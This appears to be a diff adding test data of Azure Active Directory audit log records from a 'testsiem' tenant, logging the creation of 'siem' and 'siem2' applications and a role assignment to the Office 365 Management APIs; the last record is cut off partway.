+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, 